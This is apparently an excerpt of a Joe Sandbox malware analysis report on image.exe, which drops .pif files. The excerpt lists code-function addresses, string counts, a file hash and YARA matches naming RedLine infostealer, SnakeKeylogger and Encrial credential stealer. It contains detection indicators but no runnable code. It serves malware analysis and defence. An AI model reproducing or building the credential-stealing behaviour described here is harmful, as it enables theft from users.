Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B9558	7_2_2B7B9558
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BC758	7_2_2B7BC758
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BDD38	7_2_2B7BDD38
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B7938	7_2_2B7B7938
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BAB38	7_2_2B7BAB38
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BF318	7_2_2B7BF318
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BC118	7_2_2B7BC118
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B8F18	7_2_2B7B8F18
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B0508	7_2_2B7B0508
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B8BF8	7_2_2B7B8BF8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BBDF8	7_2_2B7BBDF8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BA1D8	7_2_2B7BA1D8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BD3D8	7_2_2B7BD3D8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B09D0	7_2_2B7B09D0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B09C3	7_2_2B7B09C3
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B85B8	7_2_2B7B85B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BE9B8	7_2_2B7BE9B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BB7B8	7_2_2B7BB7B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BB7A7	7_2_2B7BB7A7
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BCD98	7_2_2B7BCD98
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B9B98	7_2_2B7B9B98
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BFC78	7_2_2B7BFC78
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BCA78	7_2_2B7BCA78
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B9878	7_2_2B7B9878
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BFC68	7_2_2B7BFC68
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BE058	7_2_2B7BE058
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B7C58	7_2_2B7B7C58
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BAE58	7_2_2B7BAE58
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B0040	7_2_2B7B0040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BF638	7_2_2B7BF638
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B9238	7_2_2B7B9238
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BC438	7_2_2B7BC438
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BC42B	7_2_2B7BC42B
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BF629	7_2_2B7BF629
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B001B	7_2_2B7B001B
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BDA18	7_2_2B7BDA18
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BA818	7_2_2B7BA818
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BA807	7_2_2B7BA807
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B04FB	7_2_2B7B04FB
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BD6F8	7_2_2B7BD6F8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BA4F8	7_2_2B7BA4F8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BA4EB	7_2_2B7BA4EB
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B88D8	7_2_2B7B88D8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BBAD8	7_2_2B7BBAD8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BECC8	7_2_2B7BECC8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B9EB8	7_2_2B7B9EB8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BD0B8	7_2_2B7BD0B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BE698	7_2_2B7BE698
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B8298	7_2_2B7B8298
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7BB498	7_2_2B7BB498
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B828B	7_2_2B7B828B
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7B0E87	7_2_2B7B0E87
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C6440	7_2_2B7C6440
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7CCA90	7_2_2B7CCA90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C3560	7_2_2B7C3560
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C0360	7_2_2B7C0360
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C4B40	7_2_2B7C4B40
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C1940	7_2_2B7C1940
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C6120	7_2_2B7C6120
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C2F20	7_2_2B7C2F20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C4500	7_2_2B7C4500
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C1300	7_2_2B7C1300
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C41E0	7_2_2B7C41E0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C0FE0	7_2_2B7C0FE0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7CE1C8	7_2_2B7CE1C8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C57C0	7_2_2B7C57C0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C25C0	7_2_2B7C25C0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7CE1B8	7_2_2B7CE1B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C3BA0	7_2_2B7C3BA0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C09A0	7_2_2B7C09A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C0991	7_2_2B7C0991
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C5180	7_2_2B7C5180
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C1F80	7_2_2B7C1F80
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C4E60	7_2_2B7C4E60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C1C60	7_2_2B7C1C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C3240	7_2_2B7C3240
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C0040	7_2_2B7C0040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7CF428	7_2_2B7CF428
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C4820	7_2_2B7C4820
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C1620	7_2_2B7C1620
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C2C00	7_2_2B7C2C00
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C5E00	7_2_2B7C5E00
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7CE0FB	7_2_2B7CE0FB
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C5AE0	7_2_2B7C5AE0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C28E0	7_2_2B7C28E0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C3EC0	7_2_2B7C3EC0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C0CC0	7_2_2B7C0CC0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C54A0	7_2_2B7C54A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C22A0	7_2_2B7C22A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C3880	7_2_2B7C3880
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7C0680	7_2_2B7C0680
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D0AB8	7_2_2B7D0AB8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D2DB0	7_2_2B7D2DB0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D03B8	7_2_2B7D03B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7DA630	7_2_2B7DA630
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D26B0	7_2_2B7D26B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D18B0	7_2_2B7D18B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D1FB0	7_2_2B7D1FB0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D3E90	7_2_2B7D3E90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D9CF4	7_2_2B7D9CF4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D11B0	7_2_2B7D11B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D0040	7_2_2B7D0040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D0037	7_2_2B7D0037
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D26A3	7_2_2B7D26A3
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D18A3	7_2_2B7D18A3
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D1FA1	7_2_2B7D1FA1
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D9CE8	7_2_2B7D9CE8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D9168	7_2_2B7D9168
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7D9158	7_2_2B7D9158
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2B7DB5D7	7_2_2B7DB5D7
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2BFACCB9	7_2_2BFACCB9
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2BFA03D4	7_2_2BFA03D4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2BFADB60	7_2_2BFADB60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2BFADB57	7_2_2BFADB57
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_2_2BFA64B8	7_2_2BFA64B8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00408C60	7_1_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_0040DC11	7_1_0040DC11
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00407C3F	7_1_00407C3F
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00418CCC	7_1_00418CCC
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00406CA0	7_1_00406CA0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_004028B0	7_1_004028B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_0041A4BE	7_1_0041A4BE
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00408C60	7_1_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00418244	7_1_00418244
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00401650	7_1_00401650
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00402F20	7_1_00402F20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_004193C4	7_1_004193C4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00418788	7_1_00418788
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00402F89	7_1_00402F89
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_00402B90	7_1_00402B90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 7_1_004073A0	7_1_004073A0
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: 9_2_02ED20C4	9_2_02ED20C4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00408C60	14_2_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_0040DC11	14_2_0040DC11
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00407C3F	14_2_00407C3F
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00418CCC	14_2_00418CCC
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00406CA0	14_2_00406CA0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_004028B0	14_2_004028B0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_0041A4BE	14_2_0041A4BE
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00408C60	14_2_00408C60
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00418244	14_2_00418244
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00401650	14_2_00401650
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00402F20	14_2_00402F20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_004193C4	14_2_004193C4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00418788	14_2_00418788
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00402F89	14_2_00402F89
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_00402B90	14_2_00402B90
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_004073A0	14_2_004073A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_25B61560	14_2_25B61560
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_25B612B4	14_2_25B612B4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_25B612C0	14_2_25B612C0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853BAC0	14_2_2853BAC0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853ABD0	14_2_2853ABD0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853BD9F	14_2_2853BD9F
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853C07F	14_2_2853C07F
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853F0C8	14_2_2853F0C8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_285341E0	14_2_285341E0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853B22D	14_2_2853B22D
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853B4FF	14_2_2853B4FF
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853D490	14_2_2853D490
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853B7DF	14_2_2853B7DF
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853AC20	14_2_2853AC20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853336D	14_2_2853336D
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_285333B5	14_2_285333B5
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853D489	14_2_2853D489
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853E5D9	14_2_2853E5D9
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_2853E5E8	14_2_2853E5E8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4B580	14_2_29E4B580
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E48550	14_2_29E48550
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E43508	14_2_29E43508
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E40040	14_2_29E40040
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E47808	14_2_29E47808
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E40738	14_2_29E40738
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E40E38	14_2_29E40E38
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4EDED	14_2_29E4EDED
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4EDF8	14_2_29E4EDF8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4B9D4	14_2_29E4B9D4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4B9D8	14_2_29E4B9D8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4E9A0	14_2_29E4E9A0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4E993	14_2_29E4E993
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 14_2_29E4B56F	14_2_29E4B56F

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\nhpoymuP.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: String function: 02CA480C appears 619 times
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: String function: 02CA46A4 appears 154 times
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: String function: 02CB8798 appears 48 times
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: String function: 02EE8798 appears 48 times
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: String function: 02ED46A4 appears 154 times
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: String function: 02ED480C appears 619 times
Source: C:\Users\user\Desktop\image.exe	Code function: String function: 02C944D0 appears 32 times
Source: C:\Users\user\Desktop\image.exe	Code function: String function: 02CA8798 appears 54 times
Source: C:\Users\user\Desktop\image.exe	Code function: String function: 02CA881C appears 45 times
Source: C:\Users\user\Desktop\image.exe	Code function: String function: 02C946A4 appears 244 times
Source: C:\Users\user\Desktop\image.exe	Code function: String function: 02C9480C appears 931 times
Source: C:\Users\user\Desktop\image.exe	Code function: String function: 02C944AC appears 73 times
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: String function: 00415639 appears 36 times
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: String function: 0040FB9C appears 60 times
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: String function: 0040D606 appears 144 times
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: String function: 0040E1D8 appears 258 times

Source: image.exe, 00000000.00000002.1744877081.0000000021E00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs image.exe
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs image.exe
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs image.exe
Source: image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs image.exe
Source: image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs image.exe
Source: image.exe, 00000000.00000003.1702911770.00000000218F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs image.exe
Source: image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs image.exe
Source: image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs image.exe
Source: image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs image.exe
Source: image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs image.exe
Source: image.exe, 00000000.00000003.1702911770.0000000021925000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs image.exe
Source: image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs image.exe
Source: image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs image.exe

Source: image.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 3.1.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.1.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.1.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.1.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
